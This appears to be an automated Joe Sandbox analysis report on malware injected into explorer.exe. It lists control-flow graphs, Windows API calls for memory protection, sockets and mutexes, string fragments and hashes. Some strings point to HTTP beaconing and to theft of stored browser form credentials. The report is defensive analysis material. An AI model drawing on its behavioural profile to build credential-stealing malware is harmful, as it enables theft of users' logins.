13914->13915 13916 f88649f 13915->13916 13918 f8828f2 NtProtectVirtualMemory 13915->13918 13917 f8828f2 NtProtectVirtualMemory 13916->13917 13921 f8864c3 13916->13921 13917->13921 13919 f886480 13918->13919 13920 f8828f2 NtProtectVirtualMemory 13919->13920 13920->13916 13922 f886597 13921->13922 13923 f8828f2 NtProtectVirtualMemory 13921->13923 13924 f8828f2 NtProtectVirtualMemory 13922->13924 13926 f8865bf 13922->13926 13923->13922 13924->13926 13925 f8866e1 13927 f889382 ObtainUserAgentString 13925->13927 13928 f8828f2 NtProtectVirtualMemory 13926->13928 13929 f8866b9 13926->13929 13930 f8866e9 13927->13930 13928->13929 13929->13925 13931 f8828f2 NtProtectVirtualMemory 13929->13931 13931->13925

              Executed Functions

              Function 0F88DF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 f88df82-f88dfb6 1 f88dfb8-f88dfbc 0->1 2 f88dfd6-f88dfd9 0->2 1->2 3 f88dfbe-f88dfc2 1->3 4 f88e8fe-f88e90c 2->4 5 f88dfdf-f88dfed 2->5 3->2 6 f88dfc4-f88dfc8 3->6 7 f88dff3-f88dff7 5->7 8 f88e8f6-f88e8f7 5->8 6->2 9 f88dfca-f88dfce 6->9 10 f88dff9-f88dffd 7->10 11 f88dfff-f88e000 7->11 8->4 9->2 13 f88dfd0-f88dfd4 9->13 10->11 12 f88e00a-f88e010 10->12 11->12 14 f88e03a-f88e060 12->14 15 f88e012-f88e020 12->15 13->2 13->5 17 f88e068-f88e07c call f88a5b2 14->17 18 f88e062-f88e066 14->18 15->14 16 f88e022-f88e026 15->16 16->8 19 f88e02c-f88e035 16->19 22 f88e081-f88e0a2 17->22 18->17 20 f88e0a8-f88e0ab 18->20 19->8 23 f88e0b1-f88e0b8 20->23 24 f88e144-f88e150 20->24 22->20 25 f88e8ee-f88e8ef 22->25 27 f88e0ba-f88e0dc call f88d942 23->27 28 f88e0e2-f88e0f5 23->28 24->25 26 f88e156-f88e165 24->26 25->8 29 f88e17f-f88e18f 26->29 30 f88e167-f88e178 call f88a552 26->30 27->28 28->25 32 f88e0fb-f88e101 28->32 35 f88e191-f88e1ad call f88a732 29->35 36 f88e1e5-f88e21b 29->36 30->29 32->25 33 f88e107-f88e109 32->33 33->25 38 f88e10f-f88e111 33->38 47 f88e1b2-f88e1da 35->47 41 f88e22d-f88e231 36->41 42 f88e21d-f88e22b 36->42 38->25 46 f88e117-f88e132 getaddrinfo 38->46 44 f88e233-f88e245 41->44 45 f88e247-f88e24b 41->45 43 f88e27f-f88e280 42->43 51 f88e283-f88e2e0 call f88ed62 call f88b482 call f88ae72 call f88f002 43->51 44->43 48 f88e24d-f88e25f 45->48 49 f88e261-f88e265 45->49 46->24 50 f88e134-f88e13c 46->50 47->36 52 f88e1dc-f88e1e1 47->52 48->43 53 f88e26d-f88e279 49->53 54 f88e267-f88e26b 49->54 50->24 63 f88e2e2-f88e2e6 51->63 64 f88e2f4-f88e354 call f88ed92 51->64 52->36 53->43 54->51 54->53 63->64 65 f88e2e8-f88e2ef call f88b042 63->65 69 f88e35a-f88e396 call f88ed62 call f88f262 call f88f002 64->69 70 f88e48c-f88e4b8 call f88ed62 call f88f262 64->70 65->64 85 f88e398-f88e3b7 call f88f262 call f88f002 69->85 86 f88e3bb-f88e3e9 call f88f262 * 2 69->86 79 f88e4d9-f88e590 call f88f262 * 3 call f88f002 * 2 call f88b482 70->79 80 f88e4ba-f88e4d5 70->80 108 f88e595-f88e5b9 call f88f262 79->108 80->79 85->86 101 f88e3eb-f88e410 call f88f002 call f88f262 86->101 102 f88e415-f88e41d 86->102 101->102 105 f88e41f-f88e425 102->105 106 f88e442-f88e448 102->106 111 f88e467-f88e487 call f88f262 105->111 112 f88e427-f88e43d 105->112 107 f88e44e-f88e456 106->107 106->108 107->108 113 f88e45c-f88e45d 107->113 121 f88e5bb-f88e5cc call f88f262 call f88f002 108->121 122 f88e5d1-f88e6ad call f88f262 * 7 call f88f002 call f88ed62 call f88f002 call f88ae72 call f88b042 108->122 111->108 112->108 113->111 132 f88e6af-f88e6b3 121->132 122->132 135 f88e6ff-f88e72d call f88a6b2 132->135 136 f88e6b5-f88e6fa call f88a382 call f88a7b2 132->136 144 f88e75d-f88e761 135->144 145 f88e72f-f88e735 135->145 152 f88e8e6-f88e8e7 136->152 149 f88e90d-f88e913 144->149 150 f88e767-f88e76b 144->150 145->144 148 f88e737-f88e74c 145->148 148->144 153 f88e74e-f88e754 148->153 154 f88e779-f88e784 149->154 155 f88e919-f88e920 149->155 156 f88e8aa-f88e8df call f88a7b2 150->156 157 f88e771-f88e773 150->157 152->25 153->144 160 f88e756 153->160 161 f88e786-f88e793 154->161 162 f88e795-f88e796 154->162 155->161 156->152 157->154 157->156 160->144 161->162 164 f88e79c-f88e7a0 161->164 162->164 167 f88e7b1-f88e7b2 164->167 168 f88e7a2-f88e7af 164->168 170 f88e7b8-f88e7c4 167->170 168->167 168->170 173 f88e7f4-f88e861 setsockopt recv 170->173 174 f88e7c6-f88e7ef call f88ed92 call f88ed62 170->174 177 f88e8a3-f88e8a4 173->177 178 f88e863 173->178 174->173 177->156 178->177 181 f88e865-f88e86a 178->181 181->177 184 f88e86c-f88e872 181->184 184->177 186 f88e874-f88e8a1 184->186 186->177 186->178
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: getaddrinforecvsetsockopt
              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
              • API String ID: 1564272048-1117930895
              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
              • Instruction ID: 4ee0617f0ada0a758aaaef213ba5aa49d31a0f1d6c9401e7d0466aaa182c6249
              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
              • Instruction Fuzzy Hash: CB525D31618B089BDB69FFA8C4847E9B7E1FB54300F50462ED4AFCB146DA34B54ACB91
              Function 0F88D232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 303 f88d232-f88d256 304 f88d25c-f88d260 303->304 305 f88d8bd-f88d8cd 303->305 304->305 306 f88d266-f88d2a0 304->306 307 f88d2bf 306->307 308 f88d2a2-f88d2a6 306->308 309 f88d2c6 307->309 308->307 310 f88d2a8-f88d2ac 308->310 311 f88d2cb-f88d2cf 309->311 312 f88d2ae-f88d2b2 310->312 313 f88d2b4-f88d2b8 310->313 315 f88d2f9-f88d30b 311->315 316 f88d2d1-f88d2f7 call f88d942 311->316 312->309 313->311 314 f88d2ba-f88d2bd 313->314 314->311 320 f88d378 315->320 321 f88d30d-f88d332 315->321 316->315 316->320 322 f88d37a-f88d3a0 320->322 323 f88d3a1-f88d3a8 321->323 324 f88d334-f88d33b 321->324 325 f88d3aa-f88d3d3 call f88d942 323->325 326 f88d3d5-f88d3dc 323->326 327 f88d33d-f88d360 call f88d942 324->327 328 f88d366-f88d370 324->328 325->320 325->326 331 f88d3de-f88d40a call f88d942 326->331 332 f88d410-f88d458 NtCreateFile call f88d172 326->332 327->328 328->320 329 f88d372-f88d373 328->329 329->320 331->320 331->332 339 f88d45d-f88d45f 332->339 339->320 340 f88d465-f88d46d 339->340 340->320 341 f88d473-f88d476 340->341 342 f88d478-f88d481 341->342 343 f88d486-f88d48d 341->343 342->322 344 f88d48f-f88d4b8 call f88d942 343->344 345 f88d4c2-f88d4ec 343->345 344->320 350 f88d4be-f88d4bf 344->350 351 f88d8ae-f88d8b8 345->351 352 f88d4f2-f88d4f5 345->352 350->345 351->320 353 f88d4fb-f88d4fe 352->353 354 f88d604-f88d611 352->354 356 f88d55e-f88d561 353->356 357 f88d500-f88d507 353->357 354->322 361 f88d616-f88d619 356->361 362 f88d567-f88d572 356->362 358 f88d538-f88d559 357->358 359 f88d509-f88d532 call f88d942 357->359 366 f88d5e9-f88d5fa 358->366 359->320 359->358 364 f88d6b8-f88d6bb 361->364 365 f88d61f-f88d626 361->365 367 f88d5a3-f88d5a6 362->367 368 f88d574-f88d59d call f88d942 362->368 374 f88d739-f88d73c 364->374 375 f88d6bd-f88d6c4 364->375 370 f88d628-f88d651 call f88d942 365->370 371 f88d657-f88d66b call f88ee92 365->371 366->354 367->320 373 f88d5ac-f88d5b6 367->373 368->320 368->367 370->320 370->371 371->320 394 f88d671-f88d6b3 371->394 373->320 383 f88d5bc-f88d5e6 373->383 380 f88d742-f88d749 374->380 381 f88d7c4-f88d7c7 374->381 376 f88d6f5-f88d734 375->376 377 f88d6c6-f88d6ef call f88d942 375->377 399 f88d894-f88d8a9 376->399 377->351 377->376 387 f88d77a-f88d7bf 380->387 388 f88d74b-f88d774 call f88d942 380->388 381->320 389 f88d7cd-f88d7d4 381->389 383->366 387->399 388->351 388->387 390 f88d7fc-f88d803 389->390 391 f88d7d6-f88d7f6 call f88d942 389->391 397 f88d82b-f88d835 390->397 398 f88d805-f88d825 call f88d942 390->398 391->390 394->322 397->351 404 f88d837-f88d83e 397->404 398->397 399->322 404->351 407 f88d840-f88d886 404->407 407->399
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateFile
              • String ID: `
              • API String ID: 823142352-2679148245
              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
              • Instruction ID: 00c723ef8b97546b1b6f2207209b76a276dd0c49c0fb22507bdd55583ba3deb5
              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
              • Instruction Fuzzy Hash: D7224D71A18F099FCB59EF28C4946EAF7E1FB98305F40062ED45EDB291DB30A452CB81
              Function 0F88EE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 447 f88ee12-f88ee38 448 f88ee45-f88ee6e NtProtectVirtualMemory 447->448 449 f88ee40 call f88d942 447->449 450 f88ee7d-f88ee8f 448->450 451 f88ee70-f88ee7c 448->451 449->448
              APIs
              • NtProtectVirtualMemory.NTDLL ref: 0F88EE67
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: MemoryProtectVirtual
              • String ID:
              • API String ID: 2706961497-0
              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
              • Instruction ID: 68695919169100be61413d40be98948c9613c28d1035b55f612633d550f3aaff
              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
              • Instruction Fuzzy Hash: D8019E30668B884F8B88EF6C948416AB7E4FBCA314F000B3EA99AC7251EB64C5424742
              Function 0F88EE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 452 f88ee0a-f88ee6e call f88d942 NtProtectVirtualMemory 455 f88ee7d-f88ee8f 452->455 456 f88ee70-f88ee7c 452->456
              APIs
              • NtProtectVirtualMemory.NTDLL ref: 0F88EE67
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: MemoryProtectVirtual
              • String ID:
              • API String ID: 2706961497-0
              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
              • Instruction ID: 3e8cda23d1dd32a9e24537d15d9047e81262b43cf466e5e19d44bf013ec1c96f
              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
              • Instruction Fuzzy Hash: 0601A234668B884B8B48EB7C94452A6B3E5FBCE314F000B3EE9DAC3241DB65D5024782
              Function 0F8888C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • ObtainUserAgentString.URLMON ref: 0F8889A0
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: AgentObtainStringUser
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 2681117516-319646191
              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction ID: d43ea991e24da732c58620305bb92735984369d7f6d6782ca871c36ea30fa93a
              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction Fuzzy Hash: DD31BF31614A4C9ECB04FFA8C8847EDB7E1FF98205F40022AD44EDB241DF789646879A
              Function 0F8888BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • ObtainUserAgentString.URLMON ref: 0F8889A0
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: AgentObtainStringUser
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 2681117516-319646191
              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction ID: e69d68584b83d8604f939e9d41b6e83fd32a8e0bda6b5057892db4c9cbfa1066
              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction Fuzzy Hash: 5321C330610B4C9ECF04FFA8C8447ED7BE1FF58205F40421AD45ADB251DF7896068796
              Function 0F884B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 232 f884b66-f884b68 233 f884b6a-f884b6b 232->233 234 f884b93-f884bb8 232->234 235 f884b6d-f884b71 233->235 236 f884bbe-f884c22 call f88b612 call f88d942 * 2 233->236 237 f884bbb-f884bbc 234->237 235->237 238 f884b73-f884b92 235->238 246 f884c28-f884c2b 236->246 247 f884cdc 236->247 237->236 238->234 246->247 248 f884c31-f884cd3 call f88fda4 call f88f022 call f88f3e2 call f88f022 call f88f3e2 CreateMutexW 246->248 249 f884cde-f884cf6 247->249 248->247 263 f884cd5-f884cda 248->263 263->249
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID: .dll$el32$kern
              • API String ID: 1964310414-1222553051
              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
              • Instruction ID: d43be35701fe8a9083cfd06a747dd8dfbc7491a52bb77235900fac2f7573f357
              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
              • Instruction Fuzzy Hash: FB417C71918A088FDB54FFA8C8987ED77E1FF98300F40417AC84ADB256EE349946CB85
              Function 0F884B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID: .dll$el32$kern
              • API String ID: 1964310414-1222553051
              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
              • Instruction ID: bcc6962ff600a4874bcb407f6f3f2c147e1538a81ae5997d437adf9cc144a8ff
              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
              • Instruction Fuzzy Hash: F3415A70918A088FDB94EFA8C8987ED77E1FF98300F44416AC84ADB256DE349946CB95
              Function 0F88A72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 293 f88a72e-f88a768 294 f88a788-f88a7ab connect 293->294 295 f88a76a-f88a782 call f88d942 293->295 295->294
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: connect
              • String ID: conn$ect
              • API String ID: 1959786783-716201944
              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
              • Instruction ID: 70f9250e48ba67af5b26d2846bebbaf8ed50721e65ffd3fca907f0c577b968fa
              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
              • Instruction Fuzzy Hash: 5E015E30618B188FCB98EF1CE088B55B7E0FB58314F1545AED90DCB266C674D8818BC2
              Function 0F88A732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 298 f88a732-f88a768 299 f88a788-f88a7ab connect 298->299 300 f88a76a-f88a782 call f88d942 298->300 300->299
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: connect
              • String ID: conn$ect
              • API String ID: 1959786783-716201944
              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
              • Instruction ID: 25990bdcbbf9e331d2bf4c99255472ff1078e2a066be37eb38e6b03cde4ef2ce
              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
              • Instruction Fuzzy Hash: EB014F70618A1C8FCB98EF5CE488B55B7E0FB59314F1541AEE80DCB266CB74C9818BC2
              Function 0F88A6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 411 f88a6b2-f88a6e5 412 f88a705-f88a72d send 411->412 413 f88a6e7-f88a6ff call f88d942 411->413 413->412
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: send
              • String ID: send
              • API String ID: 2809346765-2809346765
              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
              • Instruction ID: d872af9fc1c771cfd086953f746ee64060d7df00069279e4cb3af22f33bb589f
              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
              • Instruction Fuzzy Hash: 40015270558A088FCB88EF1CD088B2577E0EB58314F1541AED85DCB267C670D8818B81
              Function 0F88A5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 416 f88a5b2-f88a5ea 417 f88a60a-f88a62b socket 416->417 418 f88a5ec-f88a604 call f88d942 416->418 418->417
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: socket
              • String ID: sock
              • API String ID: 98920635-2415254727
              • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
              • Instruction ID: 2eaaa398ab592b1c96003caf5b86c86925e275be6b2138cfacb7479163fd54d5
              • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
              • Instruction Fuzzy Hash: 880121706186188FCB84EF1CD048B54BBE0FB59314F1545AED45EDB266C7B4C981CB86
              Function 0F8822DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 421 f8822dd-f882320 call f88d942 424 f8823fa-f88240e 421->424 425 f882326 421->425 426 f882328-f882339 SleepEx 425->426 426->426 427 f88233b-f882341 426->427 428 f88234b-f882352 427->428 429 f882343-f882349 427->429 431 f882370-f882376 428->431 432 f882354-f88235a 428->432 429->428 430 f88235c-f88236a call f88cf12 429->430 430->431 433 f882378-f88237e 431->433 434 f8823b7-f8823bd 431->434 432->430 432->431 433->434 437 f882380-f88238a 433->437 438 f8823bf-f8823cf call f882e72 434->438 439 f8823d4-f8823db 434->439 437->434 440 f88238c-f8823b1 call f883432 437->440 438->439 439->426 442 f8823e1-f8823f5 call f8820f2 439->442 440->434 442->426
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
              • Instruction ID: 927ec922dcbbecb1521a6fae5e8776e9fe483df87cb0c7767152b7ab03d8f969
              • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
              • Instruction Fuzzy Hash: A4316C70554B49DEDB68BF2980582E5B7A1FB54301F8442BFC91DCE117C774A052CF92
              Function 0F882412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 457 f882412-f882446 call f88d942 460 f882448-f882472 call f88fc9e CreateThread 457->460 461 f882473-f88247d 457->461
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4157684455.000000000F7A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f7a0000_explorer.jbxd
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
              • Instruction ID: 138796a11d6052dfbb0bc7e5a2585d51993b937bf9148ddc80ec0be21e323300
              • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
              • Instruction Fuzzy Hash: 08F0C230268B484FD788EF2CD84566AB3D0EBE8214F44463EA94DC7265DA29C5824716

              Non-executed Functions

              Function 0F38CD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
              • API String ID: 0-393284711
              • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
              • Instruction ID: 6b1f95104078e9c3fcd5addf3b28c9e46a6870cb96a7ec21a7a57bf67d961c8f
              • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
              • Instruction Fuzzy Hash: 0FE16870618F488FDBA5EF68C4847AAB7E0FF58311F404A2E959BC7246DF34A541CB89
              Function 0F38F792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
              • API String ID: 0-2916316912
              • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
              • Instruction ID: fe9012f01df85cb2d2816c7120c2f22f3e503bc2fc37fe3e659a6a9fab9a779a
              • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
              • Instruction Fuzzy Hash: F8B16930628B488EDB59EF68C485AEEB7F1FF98300F50451ED49AC7252EF74A505CB86
              Function 0F38D622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
              • API String ID: 0-1539916866
              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
              • Instruction ID: a3d00b491dc8b1bdf93dee7f7efdb36227573b42bbcefb1806a62e0c79b486bc
              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
              • Instruction Fuzzy Hash: 9D41B470A18B088FDB14EF88A4456BD7BE2FB48714F40025EE409D3286DBB99D46CBD6
              Function 0F394AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
              • API String ID: 0-355182820
              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
              • Instruction ID: ffe0c434a4dd35cebdcfba224263d819f23d03c5c66f37bfd5d198172648431d
              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
              • Instruction Fuzzy Hash: C0C15A70618B099FCB58EF28C485AEAF3E1FB94314F40472ED49AC7251DF34A656CB86
              Function 0F394F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
              • API String ID: 0-97273177
              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
              • Instruction ID: 5a7cc5cf9083a44fea710dd2336b38340a5a3d48884e7eb4c528b7d74da2ef83
              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
              • Instruction Fuzzy Hash: B851F53111C7488FDB5ADF18D8812AAB7E5FBC5710F541A2EE8CBC7242DBB49546CB82
              Function 0F38E2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
